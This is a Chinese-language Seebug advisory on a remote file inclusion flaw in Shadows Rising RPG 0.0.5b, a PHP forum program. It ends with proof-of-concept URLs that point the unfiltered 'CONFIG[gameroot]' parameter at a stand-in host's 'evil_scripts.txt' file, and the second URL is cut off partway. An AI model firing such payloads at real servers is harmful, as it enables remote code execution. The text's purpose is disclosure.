Shadows Rising RPG远程文件包含漏洞

2006-12-12T00:00:00
ID SSV:878
Type seebug
Reporter Root
Modified 2006-12-12T00:00:00

Description

Shadows Rising RPG是一款基于PHP的论坛程序。 Shadows Rising RPG不正确过滤用户提交的URI数据,远程攻击者可以利用漏洞以WEB进程权限执行任意命令。 问题是由于多个脚本对用户提交的'CONFIG[gameroot]'参数缺少过滤,提交恶意的远程服务器作为包含对象,可导致以WEB进程权限执行任意PHP代码。

Shadows Rising RPG Shadows Rising RPG 0.0.5b Pre Alpha <a href="http://sourceforge.net/projects/shadowsrising/" target="_blank">http://sourceforge.net/projects/shadowsrising/</a>

                                        
                                            
                                                http://www.site.com/[ShadowsRising_path]/core/includes/security.inc.php?CONFIG[gameroot]=[http://www.example.com/evil_scripts.txt]
http://www.site.com/[ShadowsRising_path]/core/includes/smarty.inc.php?CONFIG[gameroot]=[http://www.example.com/e